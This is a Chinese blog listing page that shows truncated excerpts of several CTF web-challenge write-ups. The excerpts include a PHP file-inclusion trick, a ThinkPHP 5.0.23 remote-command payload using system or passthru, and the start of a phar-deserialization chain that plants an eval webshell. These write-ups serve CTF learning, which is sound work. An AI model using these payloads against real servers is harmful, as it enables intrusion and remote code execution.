摘要: 打开题目 研究一圈没啥营养价值 下载源码 发现好东西 if (file_exists($page)) { require_once $page; }else{ require_once 'pages/error_page.php'; } 活的文件包含 我们直接利用 ?+config-create+/ 阅读全文
posted @ 2024-08-02 21:35 DGhh 阅读(13) 评论(0) 推荐(0) 编辑
摘要: 对源码进行简单的分析 <?php // 检查 `hint` 请求参数是否等于指定的数组值 if ($_REQUEST['hint'] == ["your?", "mine!", "hint!!"]) { // 如果条件满足,设置响应内容类型为纯文本 header("Content-type: tex 阅读全文
posted @ 2024-08-02 19:55 DGhh 阅读(9) 评论(0) 推荐(0) 编辑
摘要: 下载附件 # -*- coding: utf-8 -*- import base64 import string import random from flask import * import jwcrypto.jwk as jwk import pickle from python_jwt im 阅读全文
posted @ 2024-08-02 17:16 DGhh 阅读(18) 评论(0) 推荐(0) 编辑
摘要: 胡乱输一些东西得到版本5.0.23 get: /index.php?s=captch post: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd 但是system被过滤了我们可以用passthru代替 阅读全文
posted @ 2024-08-02 15:17 DGhh 阅读(7) 评论(0) 推荐(0) 编辑
摘要: 进入后是一个文件上传但是这里并没有漏洞点 看cookie 得到源码 <?php highlight_file(__FILE__); error_reporting(0); class story{ private $user='admin'; public $pass; public $eating 阅读全文
posted @ 2024-08-02 14:34 DGhh 阅读(9) 评论(0) 推荐(0) 编辑
摘要: 首先进入后查看源码 进入class.php 看见unlike很明显是一个phar反序列化的利用 我们有两种选择 一 一句话木马 <?php class Flag{ public $cmd; } $a=new Flag(); $a->cmd="echo \"<?=@eval(\\\$_POST['a' 阅读全文
posted @ 2024-08-02 11:48 DGhh 阅读(23) 评论(0) 推荐(0) 编辑